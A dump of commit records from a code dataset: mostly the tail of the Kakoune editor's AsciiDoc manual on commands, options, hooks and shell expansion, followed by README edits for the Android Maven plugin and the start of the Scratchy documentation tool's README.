\nFor example, _wWW_ selects 3 consecutive words.\n\nUsing Counts\n------------\n\nMost selection commands also support counts, which are entered before the\ncommand itself.\n\nFor example, _3W_ selects 3 consecutive words and _3w_ selects the third word on\nthe right of the selection end.\n\n * _space_: when used with a count, keep only the count'th selection\n * _alt-space_: when used with a count, remove the count'th selection\n\nChanges\n-------\n\n * _i_: insert before current selection\n * _a_: insert after current selection\n * _d_: yank and delete current selection\n * _D_: yank concatenated and delete current selection (see _Y_)\n * _c_: yank and delete current selection and insert\n * _._: repeat last insert mode change (_i_, _a_, or _c_, including\n the inserted text)\n\n * _I_: insert at current selection begin line start\n * _A_: insert at current selection end line end\n * _o_: insert in a new line below current selection end\n * _O_: insert in a new line above current selection begin\n\n * _y_: yank selections\n * _Y_: yank selections concatenated (only one yank, containing\n all selections concatenated)\n * _p_: paste after current selection end\n * _P_: paste before current selection begin\n * _alt-p_: replace current selection with yanked text\n\n * _alt-j_: join selected lines\n * _alt-J_: join selected lines and select the spaces inserted\n in place of line breaks\n\n * _>_: indent selected lines\n * _<_: deindent selected lines\n * _alt->_: indent selected lines, including empty lines\n * _alt-<_: deindent selected lines, do not remove incomplete\n indent (3 leading spaces when indent is 4)\n\n * _|_: pipe each selection through the given external filter program\n and replace the selection with its output (see the sketch after this list).\n * _alt-|_: pipe each selection through the given external filter program\n and append the selection with its output.\n\n * _u_: undo last change\n * _U_: redo last change\n\n * _r_: replace each character with the next entered one\n * _&_: align selections: align the cursors of selections by inserting\n spaces before the first character of the selection\n * _alt-&_: copy indent: copy the indentation of the main selection\n (or the count one if a count is given) to all other ones\n\n * _`_: to lower case\n * _~_: to upper case\n * _alt-`_: swap case\n\n * _@_: convert tabs to spaces in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n * _alt-@_: convert spaces to tabs in current selections, uses the buffer\n tabstop option or the count parameter for tabstop.\n\n * _alt-R_: rotate selections content; if specified, the count groups\n selections, so +3<a-R>+ rotates (1, 2, 3) and (4, 5, 6)\n independently.
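\n\nFor instance, a sketch of the filter pipe as an +:exec+ sequence (the keystrokes are illustrative and assume a POSIX +sort+ is available): select three lines, then pipe them through sort, replacing them with the sorted result.\n\n------------------\n:exec 3x|sort<ret>\n------------------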
\n\nGoto Commands\n-------------\n\nCommands beginning with g are used to go to a certain position and\/or buffer:\n\n * _gh_: select to line begin\n * _gl_: select to line end\n\n * _gg_, _gk_: go to the first line\n * _gj_: go to the last line\n\n * _gt_: go to the first displayed line\n * _gc_: go to the middle displayed line\n * _gb_: go to the last displayed line\n\n * _ga_: go to the previous (alternate) buffer\n * _gf_: open the file whose name is selected\n\n * _g._: go to the last buffer modification position\n\nView commands\n-------------\n\nSome commands, all beginning with v, permit manipulating the current\nview.\n\n * _vv_ or _vc_: center the main selection in the window\n * _vt_: scroll to put the main selection on the top line of the window\n * _vb_: scroll to put the main selection on the bottom line of the window\n * _vh_: scroll the window count columns left\n * _vj_: scroll the window count lines downward\n * _vk_: scroll the window count lines upward\n * _vl_: scroll the window count columns right\n\nJump list\n---------\n\nSome commands, like the goto commands, buffer switches or search commands,\npush the previous selections to the client's jump list. It is possible\nto go forward or backward in the jump list using:\n\n * _control-i_: Jump forward\n * _control-o_: Jump backward\n * _control-s_: save current selections\n\nMulti Selection\n---------------\n\nKak was designed from the start to handle multiple selections.\nOne way to get a multiselection is via the _s_ key.\n\nFor example, to change all occurrences of the word 'roger' to the word 'marcel'\nin a paragraph, here is what can be done:\n\nSelect the paragraph with enough presses of _x_. Press _s_ and enter roger, then enter.\nNow the paragraph selection is replaced with a multiselection of each roger in\nthe paragraph. Press _c_ and marcel<esc> to replace the rogers with marcels.\n\nA multiselection can also be obtained with _S_, which splits the current\nselection according to the regex entered. To split a comma separated list,\nuse _S_ then ', *'\n\n_s_ and _S_ share the search pattern with _\/_, and hence entering an empty\npattern uses the last one.\n\nAs a convenience, _alt-s_ allows you to split the current selections on\nline boundaries.\n\nTo clear multiple selections, use _space_. To keep only the nth selection\nuse _n_ followed by _space_; to remove only the nth selection, use _n_\nfollowed by _alt-space_.\n\n_alt-k_ allows you to enter a regex and keep only the selections that\ncontain a match for this regex. Using _alt-K_ you can keep the selections\nnot containing a match.\n\n_$_ allows you to enter a shell command and pipe each selection to it.\nSelections for which the shell command returns 0 will be kept, the others will be dropped.
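\n\nAs a single +:exec+ sequence, the roger to marcel walkthrough above might look like this sketch (illustrative only, assuming the paragraph spans three lines):\n\n-------------------------------\n:exec 3xsroger<ret>cmarcel<esc>\n-------------------------------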
\n\nObject Selection\n----------------\n\nSome keys allow you to select a text object:\n\n * _alt-a_: selects the whole object\n * _alt-i_: selects the inner object, that is the object excluding its surroundings.\n For example, for a quoted string this will not select the quote, and\n for a word this will not select trailing spaces.\n * _[_: selects to object start\n * _]_: selects to object end\n * _{_: extends selections to object start\n * _}_: extends selections to object end\n\nAfter this key, you need to enter a second key in order to specify which\nobject you want.\n\n * _b_, _(_ or _)_: select the enclosing parenthesis\n * _B_, _{_ or _}_: select the enclosing {} block\n * _r_, _[_ or _]_: select the enclosing [] block\n * _a_, _<_ or _>_: select the enclosing <> block\n * _\"_: select the enclosing double quoted string\n * _'_: select the enclosing single quoted string\n * _`_: select the enclosing grave quoted string\n * _w_: select the whole word\n * _W_: select the whole WORD\n * _s_: select the sentence\n * _p_: select the paragraph\n * _i_: select the current indentation block\n * _n_: select the number\n\nFor nestable objects, a count can be used in order to specify which surrounding\nlevel to select.\n\nRegisters\n---------\n\nRegisters are named lists of text. They are used for various purposes, like\nstoring the last yanked text, or the capture groups associated with the\nselections.\n\nWhile in insert mode, ctrl-r followed by a register name (one character)\ninserts it.\n\nFor example, ctrl-r followed by \" will insert the currently yanked text.\nctrl-r followed by 2 will insert the second capture group from the last regex\nselection.\n\nRegisters are lists, instead of simply text, in order to interact well with\nmultiselection. Each selection has its own captures, or yank buffer.\n\nMacros\n------\n\nKakoune can record and replay a sequence of key presses.\n\nWhen pressing the _Q_ key, followed by an alphabetic key for the macro name,\nKakoune begins macro recording: every pressed key will be added to the\nmacro until the _Q_ key is pressed again.\n\nTo replay a macro, use the _q_ key, followed by the macro name.
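\n\nFor example, a sketch of recording a macro named a that appends a semicolon at the end of the current line, then replaying it (the keystrokes are illustrative):\n\n------------\nQagla;<esc>Q\nqa\n------------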
\n\nSearch selection\n----------------\n\nUsing the _*_ key, you can set the search pattern to the current selection.\nThis tries to be intelligent. It will for example detect if the current selection\nbegins and\/or ends at word boundaries, and set the search pattern accordingly.\n\nWith _alt-*_ you can set the search pattern to the current selection without\nKakoune trying to be smart.\n\nBasic Commands\n--------------\n\nCommands are entered using +:+.\n\n * +e[dit] <filename> [<line> [<column>]]+: open a buffer on the file, go to the given\n line and column. If the file is already opened, just switch to it.\n Use edit! to force reloading.\n * +w[rite] [<filename>]+: write the buffer to <filename> or use its name if\n no filename is given.\n * +q[uit]+: exit Kakoune, use quit! to force quitting even if there are\n unsaved buffers remaining.\n * +wq+: write the current buffer and quit\n * +b[uffer] <name>+: switch to buffer <name>\n * +d[el]b[uf] [<name>]+: delete the buffer <name>, use d[el]b[uf]! to force\n deleting a modified buffer.\n * +source <filename>+: execute commands in <filename>\n * +runtime <filename>+: execute commands in <filename>, <filename>\n is relative to the kak executable path.\n * +nameclient <name>+: set current client name\n * +namebuf <name>+: set current buffer name\n * +echo <text>+: show <text> in the status line\n * +nop+: does nothing, but as with every other command, arguments may be\n evaluated. So nop can be used for example to execute a shell command\n while being sure that its output will not be interpreted by kak.\n +:%sh{ echo echo tchou }+ will echo tchou in Kakoune, whereas\n +:nop %sh{ echo echo tchou }+ will not, but both will execute the\n shell command.\n\nExec and Eval\n-------------\n\nThe +:exec+ and +:eval+ commands can be used for running Kakoune commands.\n+:exec+ executes keys as if they were pressed, whereas +:eval+ executes its given\nparameters as if they were entered in the command prompt. By default,\nthey do their execution in the context of the current client.\n\nSome parameters provide a way to change the context of execution:\n\n * +-client <name>+: execute in the context of the client named <name>\n * +-try-client <name>+: execute in the context of the client named\n <name> if such a client exists, or else in the current context.\n * +-draft+: execute in a copy of the context of the selected client;\n modifications to the selections or input state will not affect\n the client. This permits making modifications to the buffer\n without modifying the user's selections.\n * +-itersel+ (requires +-draft+): execute once per selection, in a\n context with only the considered selection. This permits avoiding\n cases where the selections may get merged.\n * +-buffer <names>+: execute in the context of each buffer in the\n comma separated list <names>\n * +-no-hooks+: disable hook execution while executing the keys\/commands\n\nThe execution stops when the last key\/command is reached, or an error\nis raised.\n\nKey parameters get concatenated, so the following commands are equivalent.\n\n----------------------\n:exec otest<space>1\n:exec o test <space> 1\n----------------------\n\nString syntax\n-------------\n\nWhen entering a command, parameters are separated by whitespace (shell like);\nif you want to give parameters with spaces, you should quote them.\n\nKakoune supports three string syntaxes:\n\n * +\"strings\" and \\'strings\\'+: classic strings, use \\' or \\\" to escape the\n separator.\n\n * +%\\{strings\\}+: these strings are very useful when entering commands\n\n - the '{' and '}' delimiters are configurable: you can use any non\n alphanumeric character, like %[string], %<string>, %(string), %~string~\n or %!string!...\n - if the character following the % is one of {[(<, then the closing one is\n the matching }])> and the delimiters are not escapable but are nestable.\n For example +%{ roger {}; }+ is a valid string, +%{ marcel \\}+ as well.\n\nOptions\n-------\n\nFor user configuration, Kakoune supports options.\n\nOptions are typed; their type can be\n\n * +int+: an integer number\n * +bool+: a boolean value, +yes\/true+ or +no\/false+\n * +yesnoask+: similar to a boolean, but the additional\n value +ask+ is supported.\n * +str+: a string, some freeform text\n * +regex+: as a string, but the +set+ commands will complain\n if the entered text is not a valid regex.\n * +{int,str}-list+: a list; elements are separated by a colon (:).\n If an element needs to contain a colon, it can be escaped with a\n backslash.\n\nOption values can be changed using the +set+ commands:\n\n--------------------------------------------------------------\n:set [global,buffer,window] <option> <value> # buffer, window, or global scope\n--------------------------------------------------------------\n\nOption values can differ by scope: an option can have a global\nvalue, a buffer value and a window value. The effective value of an\noption depends on the current context. If we have a window in the\ncontext (interactive editing for example), then the window value\n(if any) is used; if not we try the buffer value (if we have a buffer\nin the context), and if not we use the global value.\n\nThat means that two windows on the same buffer can use different options\n(like different filetype, or different tabstop). However some options\nmight end up ignored if their scope is not in the command context:\n\nWriting a file never uses the window options for example, so any\noptions related to writing won't be taken into account if set in the\nwindow scope (+BOM+ or +eolformat+ for example).
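\n\nFor example, a sketch of a per-window override (the values are illustrative):\n\n---------------------\n:set global tabstop 8\n:set window tabstop 4\n---------------------\n\nThe current window then uses a tabstop of 4, while other windows keep falling back to the global value of 8.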
\n\nNew options can be declared using the +:decl+ command:\n\n---------------------------------------\n:decl [-hidden] <type> <name> [<value>]\n---------------------------------------\n\nThe +-hidden+ parameter makes the option invisible in completion, but\nstill modifiable.\n\nSome options are built in Kakoune, and can be used to control its behaviour:\n\n * +tabstop+ _int_: width of a tab character.\n * +indentwidth+ _int_: width (in spaces) used for indentation.\n 0 means a tab character.\n * +scrolloff+ _int_: number of lines to keep visible above\/below\n the cursor when scrolling.\n * +eolformat+ _string_ ('lf' or 'crlf'): the format of end of lines when\n writing a buffer, this is autodetected on load.\n * +BOM+ _string_ (\"no\" or \"utf-8\"): define if the file should be written\n with a Unicode byte order mark.\n * +complete_prefix+ _bool_: when completing in the command line, and multiple\n candidates exist, enable completion with the common prefix.\n * +incsearch+ _bool_: execute search as it is typed\n * +aligntab+ _bool_: use tabs for the align command\n * +autoinfo+ _bool_: display an automatic information box for certain commands.\n * +autoshowcompl+ _bool_: automatically display possible completions when\n editing a prompt.\n * +ignored_files+ _regex_: filenames matching this regex won't be considered\n as candidates on filename completion (except if the text being completed\n already matches it).\n * +filetype+ _str_: arbitrary string defining the type of the file.\n Filetype dependent actions should hook on this option changing for\n activation\/deactivation.\n * +path+ _str-list_: directories to search for the gf command.\n * +completers+ _str-list_: completion systems to use for insert mode\n completion. The given completers are tried in order until one generates some\n completion candidates. Existing completers are:\n - +word=all+ or +word=buffer+ which complete using words in all buffers\n (+word=all+) or only the current one (+word=buffer+)\n - +filename+ which tries to detect when a filename is being entered and\n provides completion based on the local filesystem.\n - +option=<opt-name>+ where <opt-name> is a _str-list_ option. The first\n element of the list should follow the format:\n _<line>.<column>[+<length>]@<timestamp>_ to define where the completion\n applies in the buffer, and the other strings are the candidates\n (see the sketch after this list).\n * +autoreload+ _yesnoask_: auto reload the buffers when an external\n modification is detected.
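\n\nFor instance, a sketch of declaring and wiring an option based completer (the option name, coordinates and candidates are illustrative):\n\n-----------------------------------------------------\n:decl str-list my_completions\n:set buffer completers option=my_completions:word=all\n-----------------------------------------------------\n\nAn external tool can then fill +my_completions+ with something like +7.3@42:candidateA:candidateB+ to offer the two candidates at line 7, column 3 of buffer timestamp 42.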
\n\nInsert mode completion\n----------------------\n\nKakoune can propose completions while inserting text; the +completers+ option\ncontrols automatic completion, which kicks in when a certain idle timeout is\nreached (100 milliseconds). Insert mode completion can be explicitly triggered\nusing *control-x*, followed by:\n\n * *f* : filename completion\n * *w* : buffer word completion\n * *l* : buffer line completion\n * *o* : option based completion\n\nHighlighters\n------------\n\nManipulation of the displayed text is done through highlighters, which can be added\nor removed with the command\n\n-----------------------------------------------------\n:addhl <highlighter_name> <highlighter_parameters...>\n-----------------------------------------------------\n\nand\n\n----------------------\n:rmhl <highlighter_id>\n----------------------\n\nExisting highlighters are:\n\n * +number_lines+: show line numbers\n * +group <group_name>+: highlighter group, containing other highlighters.\n Useful when multiple highlighters work together and need to be\n removed as one. Adding and removing from a group can be done using\n `:addhl -group <group> <highlighter_name> <highlighter_parameters...>`\n `:rmhl -group <group> <highlighter_name>`\n * +regex <ex> <color>...+: highlight a regex, takes the regex as first parameter,\n followed by any number of color parameters. The color format is:\n <capture_id>:<fg_color>[,<bg_color>]\n For example: `:addhl regex \/\/(\\h+TODO:)?[^\\n]+ 0:cyan 1:yellow,red`\n will highlight C++ style comments in cyan, with an optional 'TODO:' in\n yellow on red background.\n * +search <color>+: highlight every match of the current search pattern. Takes\n one parameter for the color to apply to highlighted elements.\n * +flag_lines <flag> <option_name>+: add a column in front of the text, and display the\n given flag in it for every line contained in the int-list option named\n <option_name>.\n * +show_matching+: highlight the matching character of the character under the selections'\n cursors using the +MatchingChar+ color alias.\n\nShared Highlighters\n~~~~~~~~~~~~~~~~~~~\n\nHighlighters are often defined for a specific filetype, and it then makes sense to\nshare the highlighters between all the windows on the same filetype.\n\nA shared highlighter can be defined with\n\n-----------------------\ndefhl <shared_hl_name>\n-----------------------\n\nHighlighters can be added to it using the regular +:addhl+ command, with the\n+-def-group <shared_hl_name>+ option.\n\nIt can then be referenced in a window using the +ref+ highlighter.\n\n--------------------------\naddhl ref <shared_hl_name>\n--------------------------\n\nHooks\n-----\n\nCommands can be registered to be executed when certain events arise.\nTo register a hook, use the hook command.\n\n------------------------------------------------------\n:hook <scope> <hook_name> <filtering_regex> <commands>\n------------------------------------------------------\n\n<scope> can be either global, buffer or window (or any of their prefixes);\nthe scopes are hierarchical, meaning that a window calling a hook will\nexecute its own, the buffer ones and the global ones.\n\n<commands> is a string containing the commands to execute when the hook is\ncalled.\n\nFor example, to automatically use line numbering with .cc files,\nuse the following command:\n\n-----------------------------------------------------\n:hook global WinCreate .*\\.cc %{ addhl number_lines }\n-----------------------------------------------------\n\nExisting hooks are:\n\n * +NormalIdle+: A certain duration has passed since the last key was pressed in\n normal mode.\n * +NormalBegin+: Entering normal mode\n * +NormalEnd+: Leaving normal mode\n * +NormalKey+: A key is received in normal mode, the key is used for filtering
\n * +InsertIdle+: A certain duration has passed since the last key was pressed in\n insert mode.\n * +InsertBegin+: Entering insert mode\n * +InsertEnd+: Leaving insert mode\n * +InsertKey+: A key is received in insert mode, the key is used for filtering\n * +InsertMove+: The cursor moved (without inserting) in insert mode, the key\n that triggered the move is used for filtering\n * +WinCreate+: A window was created, the filtering text is the buffer name\n * +WinClose+: A window was destroyed, the filtering text is the buffer name\n * +WinDisplay+: A window was bound to a client, the filtering text is the buffer\n name\n * +WinSetOption+: An option was set in a window context, the filtering text\n is '<option_name>=<new_value>'\n * +BufSetOption+: An option was set in a buffer context, the filtering text\n is '<option_name>=<new_value>'\n * +BufNew+: A buffer for a new file has been created, the filename is used for\n filtering\n * +BufOpen+: A buffer for an existing file has been created, the filename is\n used for filtering\n * +BufCreate+: A buffer has been created, the filename is used for filtering\n * +BufWritePre+: Executed just before a buffer is written, the filename is\n used for filtering.\n * +BufWritePost+: Executed just after a buffer is written, the filename is\n used for filtering.\n * +RuntimeError+: An error was encountered while executing a user command;\n the error message is used for filtering\n * +KakBegin+: Kakoune started, this is called just after reading the user\n configuration files\n * +KakEnd+: Kakoune is quitting.\n\nWhen not specified, the filtering text is an empty string.\n\nKey Mapping\n-----------\n\nYou can redefine a key's meaning using the map command\n\n------------------------------------------------------\n:map <scope> <mode> <key> <keys>\n------------------------------------------------------\n\nwith +scope+ being one of +global, buffer or window+ (or any prefix),\n+mode+ being +insert, normal, prompt or menu+ (or any prefix), +key+ being\na single key name and +keys+ a list of keys.
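\n\nFor example, a sketch of two mappings (the chosen keys are illustrative, and the first one assumes rc\/grep.kak is loaded):\n\n-----------------------------------\n:map global normal <c-g> :grep<ret>\n:map buffer insert <c-d> <esc>\n-----------------------------------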
\n\nColor Aliases\n-------------\n\nColorspecs take the form <fg_color>[,<bg_color>]; they can be named using the\nfollowing command.\n\n--------------------------\n:colalias <name> <colspec>\n--------------------------\n\nNote that a colspec can itself be a color alias.\n\nUsing color aliases instead of colorspecs permits changing the effective colors\nafterwards.\n\nThere are some builtin color aliases:\n\n * +PrimarySelection+: main selection color for every selected character except\n the cursor\n * +SecondarySelection+: secondary selection color for every selected character\n except the cursor\n * +PrimaryCursor+: cursor of the primary selection\n * +SecondaryCursor+: cursor of the secondary selection\n * +LineNumbers+: colors used by the number_lines highlighter\n * +MenuForeground+: colors for the selected element in menus\n * +MenuBackground+: colors for the non-selected elements in menus\n * +Information+: colors for the information windows and information messages\n * +Error+: colors of error messages\n * +StatusLine+: colors used for the status line\n * +StatusCursor+: colors used for the status line cursor\n * +Prompt+: colors used for the prompt displayed on the status line\n\nShell expansion\n---------------\n\nA special string syntax is supported which replaces its content with the\noutput of the shell commands in it. It is similar to the shell $(...)\nsyntax and is evaluated only when needed.\nFor example, %sh{ ls } is replaced with the output of the ls command.\n\nSome of Kakoune's state is available through environment variables:\n\n * +kak_selection+: content of the main selection\n * +kak_selections+: content of the selections separated by colons; colons in\n the selection contents are escaped with a backslash.\n * +kak_bufname+: name of the current buffer\n * +kak_timestamp+: timestamp of the current buffer; the timestamp is an\n integer value which is incremented each time the buffer is modified.\n * +kak_runtime+: directory containing the kak binary\n * +kak_opt_<name>+: value of option <name>\n * +kak_reg_<r>+: value of register <r>\n * +kak_socket+: filename of the session socket (\/tmp\/kak-<session>)\n * +kak_client+: name of the current client\n * +kak_cursor_line+: line of the end of the main selection\n * +kak_cursor_column+: column of the end of the main selection (in bytes)\n * +kak_cursor_char_column+: column of the end of the main selection (in characters)\n * +kak_hook_param+: filtering text passed to the currently executing hook\n\nNote that in order to make only needed information available, Kakoune needs\nto find the environment variable reference in the shell script executed.\nHence +%sh{ .\/script.sh }+ with +script.sh+ referencing an environment\nvariable will not work.\n\nFor example, you can print information about the current file in the status\nline using:\n\n-------------------------------\n:echo %sh{ ls -l $kak_bufname }\n-------------------------------\n\nRegister and Option expansion\n-----------------------------\n\nSimilar to shell expansion, register contents and option values can be\naccessed through the %reg{<register>} and %opt{<option>} syntax.\n\nFor example, you can display the last search pattern with\n\n-------------\n:echo %reg{\/}\n-------------\n\nDefining Commands\n-----------------\n\nNew commands can be defined using the +:def+ command.\n\n------------------------------\n:def <command_name> <commands>\n------------------------------\n\n<commands> is a string containing the commands to execute.\n\ndef can also take some flags:\n\n * +-env-params+: pass parameters given to the command in the environment as\n kak_paramN with N the parameter number\n * +-shell-params+: pass parameters given to the command as positional parameters\n to any shell expansions used in the command.\n * +-file-completion+: try file completion on any parameter passed\n to this command\n * +-shell-completion+: the following string is a shell command which takes\n parameters as positional params and outputs one\n completion candidate per line.\n * +-allow-override+: allow the new command to replace an existing one\n with the same name.\n * +-hidden+: do not show the command in command name completions\n * +-docstring+: define the documentation string for the command\n\nUsing shell expansion permits defining complex commands or accessing\nKakoune state:\n\n------------------------------------------------------\n:def print_selection %{ echo %sh{ ${kak_selection} } }\n------------------------------------------------------\n\nSome helper commands can be used to define composite commands (a sketch\nfollows the list):\n\n * +:prompt <prompt> <register> <command>+: Prompt the user for a string; when\n the user validates, store the result in the given <register> and run <command>.\n The -init <str> switch allows setting the initial content.\n * +:menu <label1> <commands1> <label2> <commands2>...+: display a menu using\n the labels; the selected label's commands are executed.\n +menu+ can take a -auto-single argument, to automatically run the commands\n when only one choice is provided, and a -select-cmds argument, in which\n case menu takes three arguments per item, the last one being a command\n to execute when the item is selected (but not validated).\n * +:info <text>+: display text in an information box, it can take a -anchor\n option, which accepts +left+, +right+ and +cursor+ as values, in order to\n specify where the info box should be anchored relative to the main selection.\n * +:try <commands> catch <on_error_commands>+: prevent an error in <commands>\n from aborting the whole command execution, execute <on_error_commands>\n instead. If nothing is to be done on error, the catch part can be omitted.\n * +:reg <name> <content>+: set register <name> to <content>
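\n\nFor instance, a sketch of a composite command combining +:def+ and +:prompt+ (the command name is illustrative, and it assumes rc\/grep.kak is loaded for +:grep+):\n\n---------------------------------------------------------\n:def ask-grep %{ prompt 'pattern: ' g %{ grep %reg{g} } }\n---------------------------------------------------------\n\nRunning +:ask-grep+ prompts for a pattern, stores it in register g, and then runs +:grep+ with it.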
\n\nNote that these commands are available in interactive command mode, but are\nnot that useful in this context.\n\nFIFO Buffer\n-----------\n\nThe +:edit+ command can take a -fifo parameter:\n\n-----------------------------------\n:edit -fifo <filename> <buffername>\n-----------------------------------\n\nIn this case, a buffer named +<buffername>+ is created which reads its content\nfrom the fifo +<filename>+. When the fifo is written to, the buffer is automatically\nupdated.\n\nThis is very useful for running some commands asynchronously while displaying\ntheir result in a buffer. See rc\/make.kak and rc\/grep.kak for examples.\n\nWhen the buffer is deleted, the fifo will be closed, so any program writing\nto it will receive SIGPIPE. This is useful as it permits stopping the writing\nprogram when the buffer is deleted.\n\nMenus\n-----\n\nWhen a menu is displayed, you can use *j*, *control-n* or *tab* to select the next\nentry, and *k*, *control-p* or *shift-tab* to select the previous one.\n\nUsing the *\/* key, you can enter a regex in order to restrict the available choices\nto the matching ones.\n\nKakrc\n-----\n\nThe kakrc file next to the kak binary (in the src directory for the moment)\nis a list of kak commands to be executed at startup.\n\nThe current behaviour is to execute local user commands in the file\n$HOME\/.config\/kak\/kakrc and in all files in the $HOME\/.config\/kak\/autoload\ndirectory.\n\nPlace links to the files in src\/rc\/ in your autoload directory in order to\nexecute them on startup, or use the runtime command (which sources relative\nto the kak binary) to load them on demand.\n\nExisting command files are:\n\n * *rc\/kakrc.kak*: provides kak command file autodetection and highlighting\n * *rc\/cpp.kak*: provides C\/CPP file autodetection and highlighting and the\n +:alt+ command for switching from a C\/CPP file to the h\/hpp one.\n * *rc\/asciidoc.kak*: provides asciidoc file autodetection and highlighting\n * *rc\/diff.kak*: provides patch\/diff file autodetection and highlighting\n * *rc\/git.kak*: provides various git format highlighting (commit message editing,\n interactive rebase)\n * *rc\/git-tools.kak*: provides some git integration, like +:git-blame+, +:git-show+\n or +:git-diff-show+\n * *rc\/make.kak*: provides the +:make+ and +:errjump+ commands along with\n highlighting for compiler output.\n * *rc\/man.kak*: provides the +:man+ command\n * *rc\/grep.kak*: provides the +:grep+ and +:gjump+ commands along with highlighting\n for grep output.\n * *rc\/ctags.kak*: provides the +:tag+ command to jump to a tag definition using\n exuberant ctags files; this script requires the *readtags* binary, available\n in the exuberant ctags package but not installed by default.\n * *rc\/client.kak*: provides the +:new+ command to launch a new client on the current\n session; if tmux is detected, it launches the client in a new tmux split, else
\n in a new terminal emulator.\n * *rc\/clang.kak*: provides the +:clang-enable-autocomplete+ command for C\/CPP\n insert mode completion support. This requires the clang++ compiler to be\n available. You can use the +clang_options+ option to specify switches to\n be passed to the compiler.\n\nCertain command files define options, such as +grepcmd+ (for +:grep+), +makecmd+\n(for +:make+) or +termcmd+ (for +:new+).\n\nSome options are shared with commands. +:grep+ and +:make+ honor the +toolsclient+ option,\nif specified, to open their buffer in it rather than in the current client. +:man+ honors\nthe +docsclient+ option for the same purpose.\n","returncode":0,"stderr":"","license":"unlicense","lang":"AsciiDoc"} {"commit":"d04438c874cafd19b6dd62680b008e376094aea0","subject":"fixed reference to Maven version","message":"fixed reference to Maven version\n","repos":"secondsun\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,hgl888\/android-maven-plugin,secondsun\/maven-android-plugin,repanda\/android-maven-plugin,Cha0sX\/android-maven-plugin,xieningtao\/android-maven-plugin,mitchhentges\/android-maven-plugin,wskplho\/android-maven-plugin,WonderCsabo\/maven-android-plugin,CJstar\/android-maven-plugin,jdegroot\/android-maven-plugin,Stuey86\/android-maven-plugin,simpligility\/android-maven-plugin,CJstar\/android-maven-plugin,jdegroot\/android-maven-plugin,psorobka\/android-maven-plugin,hgl888\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,greek1979\/maven-android-plugin,WonderCsabo\/maven-android-plugin,mitchhentges\/android-maven-plugin,ashutoshbhide\/android-maven-plugin,Cha0sX\/android-maven-plugin,Cha0sX\/android-maven-plugin,Stuey86\/android-maven-plugin,greek1979\/maven-android-plugin,kedzie\/maven-android-plugin,xiaojiaqiao\/android-maven-plugin,kedzie\/maven-android-plugin,wskplho\/android-maven-plugin,secondsun\/maven-android-plugin,psorobka\/android-maven-plugin,repanda\/android-maven-plugin,xiaojiaqiao\/android-maven-plugin,xieningtao\/android-maven-plugin,b-cuts\/android-maven-plugin,b-cuts\/android-maven-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"== ANDROID MAVEN PLUGIN\n\nA plugin for Android application development with http:\/\/maven.apache.org[Apache Maven 3.1.1+] and \nthe http:\/\/tools.android.com[Android SDK].\n\n=== Links\n\n* http:\/\/code.google.com\/p\/maven-android-plugin[Project site] with wiki and more\n* http:\/\/code.google.com\/p\/maven-android-plugin\/issues\/list[Issue tracker]\n* http:\/\/jayway.github.io\/maven-android-plugin\/[Maven generated plugin documentation site]\n* http:\/\/www.sonatype.com\/books\/mvnref-book\/reference\/android-dev.html[Maven: Complete Reference - Chapter - Android Application Development with Maven]\n* https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/maven-android-developers[Mailinglist]\n* http:\/\/code.google.com\/p\/maven-android-plugin\/wiki\/Changelog[Changelog]\n* image:https:\/\/travis-ci.org\/jayway\/maven-android-plugin.png[\"Build Status\", link=\"https:\/\/travis-ci.org\/jayway\/maven-android-plugin\"]\n\n=== Contributions\n\nWe welcome your feature enhancements and bug fixes in pull requests!\n","old_contents":"== ANDROID MAVEN PLUGIN\n\nA plugin for Android application development with http:\/\/maven.apache.org[Apache Maven 3.0.3+] and \nthe http:\/\/tools.android.com[Android SDK].\n\n=== Links\n\n* http:\/\/code.google.com\/p\/maven-android-plugin[Project site] with wiki and more
\n* http:\/\/code.google.com\/p\/maven-android-plugin\/issues\/list[Issue tracker]\n* http:\/\/jayway.github.io\/maven-android-plugin\/[Maven generated plugin documentation site]\n* http:\/\/www.sonatype.com\/books\/mvnref-book\/reference\/android-dev.html[Maven: Complete Reference - Chapter - Android Application Development with Maven]\n* https:\/\/groups.google.com\/forum\/?fromgroups#!forum\/maven-android-developers[Mailinglist]\n* http:\/\/code.google.com\/p\/maven-android-plugin\/wiki\/Changelog[Changelog]\n* image:https:\/\/travis-ci.org\/jayway\/maven-android-plugin.png[\"Build Status\", link=\"https:\/\/travis-ci.org\/jayway\/maven-android-plugin\"]\n\n=== Contributions\n\nWe welcome your feature enhancements and bug fixes in pull requests!\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db3c0e334e2ba70317ad824df1602c0dae231f22","subject":"Adding README","message":"Adding README\n","repos":"rashidkpc\/scratchy","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"\n= Scratchy =\nRashid Khan\nv0.1, 2013-11-18\n:doctype: article\n\n[preface]\n== The Scratchy Way ==\nScratchy is a simple system for extracting user focused documentation from code. Scratchy is not\nfor API docs, though it could be if you really wanted.\nScratchy enforces no particular format. Its purpose is to assemble the scattered parts of your\ndocumentation in the order you specify, then drop them into a directory and file structure.\n\nWhile scratchy doesn't force a particular format, there are some recommendations.\n- Start every line in a comment with a specific character. Scratchy necessarily trims leading\nwhitespace to deal with indentation. If your formatter requires leading whitespace it will be\nrelative to your +--line+ argument.\n\n=== Documentation Format ===\n\nIt is up to you to decide what format you wish to document in. If you were some kind of sadist\nyou could write your docs in HTML and skip the post processing\nfootnote:[Don't do that].\nThe Scratchy documentation uses Asciidoc because it serves as a powerful intermediary to many\nother formats, but you could just as easily use something like Markdown. From there you can use\nwhatever tool you'd like to post process them.\n\n=== Scratch tag ===\n\nScratchy does not want all of your comments. To denote doc blocks that scratchy should\nextract, the opening of your comment should contain the +@scratch+ tag immediately following\nthe comment opening characters.\n\n=== Scratch path ===\n\nThe scratch path tells scratchy where to put the extracted documentation. The path is a\nsimple directory path, followed by a priority number. For example, +\/intro\/welcome\/2+\nwould be written to your output directory, in the intro directory, in the 'welcome'\nfile. It would appear after +\/intro\/welcome\/1+ if it existed. Gaps in\npriority numbers are fine, as are duplicates. Of course\norder is not guaranteed with duplicate priority numbers.
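\n\nFor example, a sketch of what a scratch block might look like in a JavaScript source file (the comment style and path are illustrative):\n\n \/* @scratch \/intro\/welcome\/2\n * Everything in this comment is extracted to the welcome file in the\n * intro directory, after any block with priority 1.\n *\/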
